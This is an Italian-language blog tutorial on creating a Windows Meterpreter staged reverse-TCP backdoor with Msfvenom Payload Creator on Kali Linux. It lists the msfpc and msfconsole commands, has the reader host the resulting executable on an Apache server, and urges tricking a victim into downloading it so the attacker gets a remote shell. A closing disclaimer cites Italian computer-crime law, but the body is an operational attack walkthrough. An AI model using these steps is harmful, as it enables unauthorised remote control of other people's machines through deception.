In questo articolo andremo a parlare del windows meterpreter reverse tcp; se avete seguito i miei precedenti tutorial, avrete già sentito questo termine più di qualche volta; in realtà stiamo parlando di uno dei principali metodi-backdoor utilizzate sulla piattaforma di Kali Linux. Ma se nelle volte precedenti applicavamo questa backdoor attraverso Metasploit Framework, questa volta il discorso cambierà leggermente, ma in sostanza il procedimento sarà sempre lo stesso.

Windows meterpreter reverse tcp: i passi da compiere

Per iniziare andate nel percorso Applicazioni>Strumenti di exploiting>Msfvenom Payload Creator. Il primo comando che digiterete una volta aperta la console sarà:

/usr/bin/msfpc windows “tuo indirizzo ip locale”

 

 

 

 

 

 

Per ottenere il vostro indirizzo IP basterà aprire un nuovo terminale e digitare il comando “ifconfig”.

 

 

 

 

 

 

Una volta eseguito il primo comando, passeremo con il secondo, ovvero il seguente:

msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc’

 

 

 

 

 

 

 

Quindi cercare la backdoor sotto questione nella cartella “home”;

 

 

 

 

 

 

Poi trasferirla nel percorso computer>var>www>html.

 

 

 

 

 

 

Fatto ciò startate un nuovo terminale e digitate il comando “service apache2 start”.

 

 

 

 

 

 

Ora, l’unica cosa che ci rimane è quella di creare un link che la vittima dovrà aprire per stabilire una connessione segreta tra il suo dispositivo e il nostro PC attaccante. Date quindi spazio al vostro ingegno per farla “abboccare”, spingendola nella trappola. La struttura del link incriminato è la seguente:

“nostro indirizzo ip”/windows-meterpreter-staged-reverse-tcp-443.exe

 

 

 

 

 

 

 

 

Una volta che la persona sotto attacco cliccherà sul link e lo scaricherà inconsapevolmente, il terminale di Msfvenom Payload Creator, che nel frattempo era in ascolto, capterà il segnale dalla macchina remota infettata; a questo punto, se non siete pratici con i comandi, potete benissimo digitare il comando “help” nello stesso terminale di MPC.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).